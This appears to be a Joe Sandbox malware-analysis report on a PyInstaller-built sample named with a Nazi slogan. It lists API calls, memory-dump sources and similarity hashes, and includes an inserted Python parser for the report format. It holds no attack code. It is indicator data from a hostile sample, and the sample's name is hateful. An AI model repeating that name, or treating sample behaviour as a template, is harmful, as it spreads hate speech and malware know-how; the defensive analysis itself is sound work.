                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 63F06D54B0A20240FE5A5EE5985B2B546905F88B80F4C5730CD0FE67E2EE2CE481A210
APIs
Memory Dump Source
• Source File: 00000001.00000002.2034183596.00007FFDFAE81000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFAE80000, based on PE: true
• Associated: 00000001.00000002.2034141796.00007FFDFAE80000.00000002.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2034183596.00007FFDFAEF3000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2034183596.00007FFDFAEF6000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2034183596.00007FFDFAF19000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2034183596.00007FFDFAF24000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2034183596.00007FFDFAF2E000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2034512265.00007FFDFAF31000.00000080.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2034545589.00007FFDFAF33000.00000004.00000001.01000000.00000010.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffdfae80000_HeilHitler.jbxd
Similarity
• API ID: ErrorLast
• String ID:
• API String ID: 1452528299-0
• Opcode ID: 7be56b9b5c195ef2355d3ed0a864c758a5bbc4b2e9c7b36c5c12c2a7c1a9fd28
• Instruction ID: 0815945402276d60b86fa22a56c780c2c53503cd34cc8cc7ec1737994d11fac7
• Opcode Fuzzy Hash: 7be56b9b5c195ef2355d3ed0a864c758a5bbc4b2e9c7b36c5c12c2a7c1a9fd28
• Instruction Fuzzy Hash: B2F08122708B8185E304AB16F4106AAA7A0FB98FC4F188071EF9E47BADCE3CD481C700
APIs
• HeapAlloc.KERNEL32(?,?,?,00007FF633D70C90,?,?,?,00007FF633D722FA,?,?,?,?,?,00007FF633D73AE9), ref: 00007FF633D7D63A
Memory Dump Source
• Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
• Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
Similarity
• API ID: AllocHeap
• String ID:
• API String ID: 4292702814-0
• Opcode ID: 510c613edcbd96140e332c46b5608733b20d975e117422ad796dc4540c81bb80
• Instruction ID: 1a67376a0a3742251bd4409ebce51042f31dabe0049eacb0d2770a301575f88f
• Opcode Fuzzy Hash: 510c613edcbd96140e332c46b5608733b20d975e117422ad796dc4540c81bb80
• Instruction Fuzzy Hash: 7EF0F815F0924A45FE656FF1594377912A05F847A0F480730DD2EE67CAEE2CB580A610
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
• Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
Similarity
• API ID: Message$ErrorLast$ObjectProcessSingleWait$CloseCreateHandlePeekWindow_invalid_parameter_noinfo$ByteCharClassCodeCommandConsoleCtrlCurrentDestroyDispatchExitFormatHandlerInfoLineMultiRegisterStartupTerminateTranslateWide
• String ID: CreateProcessW$Failed to create child process!$PyInstaller Onefile Hidden Window$PyInstallerOnefileHiddenWindow
• API String ID: 3832162212-3165540532
• Opcode ID: 99838be411f58a84d89697932930ae4644c798f1dd42cd928399edbb9bf0e48e
• Instruction ID: 8cf410ab41b0fa40752e760cc4270562d31a1d9cbf9cda09278e672fccba3f4d
• Opcode Fuzzy Hash: 99838be411f58a84d89697932930ae4644c798f1dd42cd928399edbb9bf0e48e
• Instruction Fuzzy Hash: C9D1A832A08B8286E7108FB4E8562AD3764FF84B58F401335DA6EA7BA5DF3CE155D700
APIs
Memory Dump Source
• Source File: 00000001.00000002.2033758431.00007FFDFAD61000.00000040.00000001.01000000.00000013.sdmp, Offset: 00007FFDFAD60000, based on PE: true
• Associated: 00000001.00000002.2033713501.00007FFDFAD60000.00000002.00000001.01000000.00000013.sdmp
• Associated: 00000001.00000002.2033758431.00007FFDFADC4000.00000040.00000001.01000000.00000013.sdmp
• Associated: 00000001.00000002.2033758431.00007FFDFAE13000.00000040.00000001.01000000.00000013.sdmp
• Associated: 00000001.00000002.2033758431.00007FFDFAE6C000.00000040.00000001.01000000.00000013.sdmp
• Associated: 00000001.00000002.2033758431.00007FFDFAE71000.00000040.00000001.01000000.00000013.sdmp
• Associated: 00000001.00000002.2033758431.00007FFDFAE74000.00000040.00000001.01000000.00000013.sdmp
• Associated: 00000001.00000002.2034059986.00007FFDFAE75000.00000080.00000001.01000000.00000013.sdmp
• Associated: 00000001.00000002.2034101253.00007FFDFAE77000.00000004.00000001.01000000.00000013.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffdfad60000_HeilHitler.jbxd
Similarity
• API ID: 00007E133319ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
• String ID:
• API String ID: 3962975190-0
• Opcode ID: d8a6e0e72b6848609e29a44b0cba3310e6ec791779f206a0b46e58d07e77914d
• Instruction ID: 9c6d0b533a1b572e9fd086abc4dd06a6d794b89d6aa36ce87aa723441fd0a555
• Opcode Fuzzy Hash: d8a6e0e72b6848609e29a44b0cba3310e6ec791779f206a0b46e58d07e77914d
• Instruction Fuzzy Hash: CC314D72709A818AEB688F60E8607ED7364FB84744F44483ADA5E47BD8EF3CD648CB10
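The function entries above are what an analyst pivots on: the API reference lines (for example the HeapAlloc.KERNEL32 call with its ref address), the API ID token list, and the Opcode ID and fuzzy hashes under Similarity. Two practical details are easy to miss when working from the rendered page: the ref addresses are run-time addresses inside the dump whose base is given by "Offset:" (here 00007FF633D60000 for the HeilHitler.exe image), so subtracting that base yields the RVA to look up in the on-disk PE; and the API ID and String ID fields are "$"-joined token lists. The following Python parser is an added example, not part of the Joe Sandbox report or of any Joe Sandbox tooling: the record layout, regular expressions and helper names are my own assumptions about the rendered text format, and the sample input is copied from two of the entries on this page with the "Associated" lines trimmed.

```python
"""Parse Joe Sandbox function entries (as rendered on this page) into records you can
pivot on. Added example; the layout and helpers are assumptions about the text format."""
import re
from dataclasses import dataclass, field

# Section headers exactly as the report renders them; each entry begins at "APIs".
SECTION_HEADERS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
# e.g. "HeapAlloc.KERNEL32(?,?,?,00007FF633D70C90), ref: 00007FF633D7D63A"
API_CALL_RE = re.compile(r"^(?P<api>\w+)\.(?P<module>\w+)\((?P<args>.*)\), ref: (?P<ref>[0-9A-Fa-f]+)$")
KV_RE = re.compile(r"^(?P<key>[^:]+):\s*(?P<value>.*)$")


@dataclass
class FunctionEntry:
    api_calls: list = field(default_factory=list)   # dicts with api / module / args / ref
    strings: list = field(default_factory=list)
    source_file: str = ""                           # .sdmp the function was lifted from
    image_base: int = 0                             # "Offset:" of that dump, i.e. the module base
    similarity: dict = field(default_factory=dict)  # API ID, String ID, Opcode ID, fuzzy hashes


def parse_entries(text):
    """Split the rendered text into entries; bullets belong to the current section header."""
    entries, current, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line == "APIs":                      # start of a new function entry
            current = FunctionEntry()
            entries.append(current)
            section = line
            continue
        if line in SECTION_HEADERS:
            section = line
            continue
        if current is None or not line.startswith("•"):
            continue
        body = line[1:].strip()
        if section == "APIs":
            m = API_CALL_RE.match(body)
            if m:
                current.api_calls.append(m.groupdict())
        elif section == "Strings":
            current.strings.append(body)
        elif section == "Memory Dump Source":
            m = KV_RE.match(body)
            if m and m.group("key") == "Source File":
                # value looks like "<sdmp>, Offset: <base>, based on PE: true"
                fields = [f.strip() for f in m.group("value").split(",")]
                current.source_file = fields[0]
                for f in fields[1:]:
                    if f.startswith("Offset:"):
                        current.image_base = int(f.split(":", 1)[1].strip(), 16)
        elif section == "Similarity":
            m = KV_RE.match(body)
            if m:
                current.similarity[m.group("key")] = m.group("value")
    return entries


def ref_rva(entry, ref):
    """Refs are run-time addresses; subtract the dump base to get an RVA for the on-disk PE."""
    return int(ref, 16) - entry.image_base


def id_tokens(entry, key="API ID"):
    """'API ID' / 'String ID' are '$'-joined token lists; return them as a Python list."""
    return [t for t in entry.similarity.get(key, "").split("$") if t]


def index_by(entries, key):
    """Group entries by a Similarity field (e.g. 'Opcode ID') for cross-sample pivoting."""
    idx = {}
    for e in entries:
        v = e.similarity.get(key)
        if v:
            idx.setdefault(v, []).append(e)
    return idx


# Sample input: two entries copied from this report (the HeapAlloc caller and the
# PyInstaller onefile window function), "Associated" lines trimmed.
SAMPLE = """
APIs
• HeapAlloc.KERNEL32(?,?,?,00007FF633D70C90,?,?,?,00007FF633D722FA,?,?,?,?,?,00007FF633D73AE9), ref: 00007FF633D7D63A
Memory Dump Source
• Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
Similarity
• API ID: AllocHeap
• String ID:
• API String ID: 4292702814-0
• Opcode ID: 510c613edcbd96140e332c46b5608733b20d975e117422ad796dc4540c81bb80
• Instruction Fuzzy Hash: 7EF0F815F0924A45FE656FF1594377912A05F847A0F480730DD2EE67CAEE2CB580A610
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
Similarity
• API ID: Message$ErrorLast$ObjectProcessSingleWait$CloseCreateHandlePeekWindow_invalid_parameter_noinfo
• String ID: CreateProcessW$Failed to create child process!$PyInstaller Onefile Hidden Window$PyInstallerOnefileHiddenWindow
• API String ID: 3832162212-3165540532
• Opcode ID: 99838be411f58a84d89697932930ae4644c798f1dd42cd928399edbb9bf0e48e
"""

if __name__ == "__main__":
    for e in parse_entries(SAMPLE):
        for c in e.api_calls:
            print(f"{c['api']}.{c['module']} ref {c['ref']} -> RVA {ref_rva(e, c['ref']):#x}")
        print("API tokens:", id_tokens(e), "Opcode ID:", e.similarity.get("Opcode ID"))
```

Run against the full rendered section, `index_by(entries, "Opcode ID")` gives you the keys to match against the same field in reports for other samples, and `ref_rva` turns the HeapAlloc ref 00007FF633D7D63A into RVA 0x1D63A, which is the address to jump to in the on-disk HeilHitler.exe rather than the ASLR-shifted run-time address.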
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • FindFirstFileW.KERNEL32(?,00007FF633D68919,00007FF633D63F9D), ref: 00007FF633D6842B
                                                                                                                                                                                                                                            • RemoveDirectoryW.KERNEL32(?,00007FF633D68919,00007FF633D63F9D), ref: 00007FF633D684AE
                                                                                                                                                                                                                                            • DeleteFileW.KERNEL32(?,00007FF633D68919,00007FF633D63F9D), ref: 00007FF633D684CD
                                                                                                                                                                                                                                            • FindNextFileW.KERNEL32(?,00007FF633D68919,00007FF633D63F9D), ref: 00007FF633D684DB
                                                                                                                                                                                                                                            • FindClose.KERNEL32(?,00007FF633D68919,00007FF633D63F9D), ref: 00007FF633D684EC
                                                                                                                                                                                                                                            • RemoveDirectoryW.KERNEL32(?,00007FF633D68919,00007FF633D63F9D), ref: 00007FF633D684F5
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
Similarity
• API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
• String ID: %s\*
• API String ID: 1057558799-766152087
APIs
Memory Dump Source
• Source File: 00000001.00000002.2034614271.00007FFDFAF41000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFDFAF40000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffdfaf40000_HeilHitler.jbxd
Similarity
• API ID: ByteCharMultiWide$FileFind$00007ErrorF020FirstLastNext
• String ID:
• API String ID: 1171239525-0
APIs
Memory Dump Source
• Source File: 00000001.00000002.2034183596.00007FFDFAE81000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFAE80000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffdfae80000_HeilHitler.jbxd
Similarity
• API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
• String ID:
• API String ID: 3140674995-0
APIs
Memory Dump Source
• Source File: 00000001.00000002.2034614271.00007FFDFAF41000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFDFAF40000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffdfaf40000_HeilHitler.jbxd
Similarity
• API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
• String ID:
• API String ID: 3140674995-0
APIs
Memory Dump Source
• Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3140674995-0
                                                                                                                                                                                                                                            • Opcode ID: 357b26123f7cc0566be18cabbec560c6351d8abd4e8582c9dfa9d4018571b442
                                                                                                                                                                                                                                            • Instruction ID: 43ff3b8166e9fd1da9e9b85cd0cc03098369cc9465b4e54a762af958436dc8e1
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 357b26123f7cc0566be18cabbec560c6351d8abd4e8582c9dfa9d4018571b442
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 92317672608B8586EB60CFA0E8417ED7360FB84704F444139DA5E97B99DF7CD648D710
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • _get_daylight.LIBCMT ref: 00007FF633D85C45
                                                                                                                                                                                                                                              • Part of subcall function 00007FF633D85598: _invalid_parameter_noinfo.LIBCMT ref: 00007FF633D855AC
                                                                                                                                                                                                                                              • Part of subcall function 00007FF633D7A948: RtlFreeHeap.NTDLL(?,?,?,00007FF633D82D22,?,?,?,00007FF633D82D5F,?,?,00000000,00007FF633D83225,?,?,?,00007FF633D83157), ref: 00007FF633D7A95E
                                                                                                                                                                                                                                              • Part of subcall function 00007FF633D7A948: GetLastError.KERNEL32(?,?,?,00007FF633D82D22,?,?,?,00007FF633D82D5F,?,?,00000000,00007FF633D83225,?,?,?,00007FF633D83157), ref: 00007FF633D7A968
                                                                                                                                                                                                                                              • Part of subcall function 00007FF633D7A900: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF633D7A8DF,?,?,?,?,?,00007FF633D7A7CA), ref: 00007FF633D7A909
                                                                                                                                                                                                                                              • Part of subcall function 00007FF633D7A900: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF633D7A8DF,?,?,?,?,?,00007FF633D7A7CA), ref: 00007FF633D7A92E
                                                                                                                                                                                                                                            • _get_daylight.LIBCMT ref: 00007FF633D85C34
                                                                                                                                                                                                                                              • Part of subcall function 00007FF633D855F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF633D8560C
                                                                                                                                                                                                                                            • _get_daylight.LIBCMT ref: 00007FF633D85EAA
                                                                                                                                                                                                                                            • _get_daylight.LIBCMT ref: 00007FF633D85EBB
                                                                                                                                                                                                                                            • _get_daylight.LIBCMT ref: 00007FF633D85ECC
                                                                                                                                                                                                                                            • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF633D8610C), ref: 00007FF633D85EF3
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 4070488512-0
                                                                                                                                                                                                                                            • Opcode ID: 677ea417f3249c8bdb60afb6413c0575e0f743ff33606516b420b369f71394b1
                                                                                                                                                                                                                                            • Instruction ID: 6ec99d33bdb44da6ecf2997ad356caa19763f127bc689be6710b0b8447883afe
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 677ea417f3249c8bdb60afb6413c0575e0f743ff33606516b420b369f71394b1
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 03D1E426E0824246E720DFA5D8431B96762FF84794F84A235EE0DEBB95DF3CF441A740
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1239891234-0
                                                                                                                                                                                                                                            • Opcode ID: ae2d74aaff6e8c1310ec24f87c3395aa5518f909cdba62f6f822c67f0a9cc142
                                                                                                                                                                                                                                            • Instruction ID: d85780c84839de040bc3890f67e64cd2644d1c0eb61610f31f65aaa08a9a8677
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ae2d74aaff6e8c1310ec24f87c3395aa5518f909cdba62f6f822c67f0a9cc142
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9331A232608F8186DB60CF64E8413AE33A4FB88758F500236EA9D97BA9DF3CD145DB00
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2227656907-0
                                                                                                                                                                                                                                            • Opcode ID: 471de8175ffa50438b20796c5ba06e190623de8bcba55c14971da5e7bf2bc1ae
                                                                                                                                                                                                                                            • Instruction ID: 74b5afc23294b8b436fcf21b3ec6f5666c4b3d65eb5e36be9ad9fec28f369967
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 471de8175ffa50438b20796c5ba06e190623de8bcba55c14971da5e7bf2bc1ae
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 85B10762B1869241EA619FA5D4025B9A390FF44BE4F446331EE5EABBC5DF3CF445D300
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2034512265.00007FFDFAF31000.00000080.00000001.01000000.00000010.sdmp, Offset: 00007FFDFAE80000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034141796.00007FFDFAE80000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAE81000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAEF3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAEF6000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAF19000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAF24000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAF2E000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034545589.00007FFDFAF33000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdfae80000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ProtectVirtual$AddressLibraryLoadProc
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3300690313-0
                                                                                                                                                                                                                                            • Opcode ID: 55e6f5dda0f56247063ea5389dc22ddd15faef173de17707deda63e565c13c3a
                                                                                                                                                                                                                                            • Instruction ID: ec94b1d94c4d4fb9f359f834afa0cf7d29189b650e427982647f2d9bf188f4d3
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 55e6f5dda0f56247063ea5389dc22ddd15faef173de17707deda63e565c13c3a
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 47622A2272829286E7198F38D41067D7790FF58795F0456B5FAAEC77C8EA3CEA85C700
APIs
• _get_daylight.LIBCMT ref: 00007FF633D85EAA
  • Part of subcall function 00007FF633D855F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF633D8560C
• _get_daylight.LIBCMT ref: 00007FF633D85EBB
  • Part of subcall function 00007FF633D85598: _invalid_parameter_noinfo.LIBCMT ref: 00007FF633D855AC
• _get_daylight.LIBCMT ref: 00007FF633D85ECC
  • Part of subcall function 00007FF633D855C8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF633D855DC
  • Part of subcall function 00007FF633D7A948: RtlFreeHeap.NTDLL(?,?,?,00007FF633D82D22,?,?,?,00007FF633D82D5F,?,?,00000000,00007FF633D83225,?,?,?,00007FF633D83157), ref: 00007FF633D7A95E
  • Part of subcall function 00007FF633D7A948: GetLastError.KERNEL32(?,?,?,00007FF633D82D22,?,?,?,00007FF633D82D5F,?,?,00000000,00007FF633D83225,?,?,?,00007FF633D83157), ref: 00007FF633D7A968
• GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF633D8610C), ref: 00007FF633D85EF3
Memory Dump Source
• Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
Similarity
• API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
• String ID:
• API String ID: 3458911817-0
Memory Dump Source
• Source File: 00000001.00000002.2034183596.00007FFDFAE81000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFAE80000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffdfae80000_HeilHitler.jbxd
Similarity
• API ID: 00007
• String ID: ..\s\ssl\statem\extensions_srvr.c$D:\_w\1\s\ssl\packet_local.h
• API String ID: 3568877910-927607112
Memory Dump Source
• Source File: 00000001.00000002.2033758431.00007FFDFAD61000.00000040.00000001.01000000.00000013.sdmp, Offset: 00007FFDFAD60000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffdfad60000_HeilHitler.jbxd
Similarity
• API ID: 00007F767
• String ID: _/yZ_&
• API String ID: 1545044454-2545492802
Memory Dump Source
• Source File: 00000001.00000002.2034183596.00007FFDFAE81000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFAE80000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffdfae80000_HeilHitler.jbxd
Similarity
• API ID: 00007
• String ID: ..\s\ssl\statem\statem_srvr.c$resumption
• API String ID: 3568877910-332775882
Memory Dump Source
• Source File: 00000001.00000002.2034614271.00007FFDFAF41000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFDFAF40000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB266000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB282000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB28F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2035725372.00007FFDFB293000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2035764384.00007FFDFB294000.00000004.00000001.01000000.0000000F.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffdfaf40000_HeilHitler.jbxd
Similarity
• API ID: ErrorLastbind
• String ID: ..\s\crypto\bio\b_sock2.c
• API String ID: 2328862993-3200932406
• Opcode ID: c767e834a84740a79c233dcad0d39ea44b2e2a28cfc1136448b175a4500b188a
• Instruction ID: 43209ef247d1958d6b715257d0260f370c8b9a833a288914f113436f2ce74c9a
• Opcode Fuzzy Hash: c767e834a84740a79c233dcad0d39ea44b2e2a28cfc1136448b175a4500b188a
• Instruction Fuzzy Hash: 78219D32B1955386E710DB26E810AAD6760FB80B98F400231EA6C47BEDDF3DE695CB40
APIs
• GetProcAddress.KERNEL32(?,00007FF633D664CF,?,00007FF633D6336E), ref: 00007FF633D65840
• GetLastError.KERNEL32(?,00007FF633D664CF,?,00007FF633D6336E), ref: 00007FF633D65852
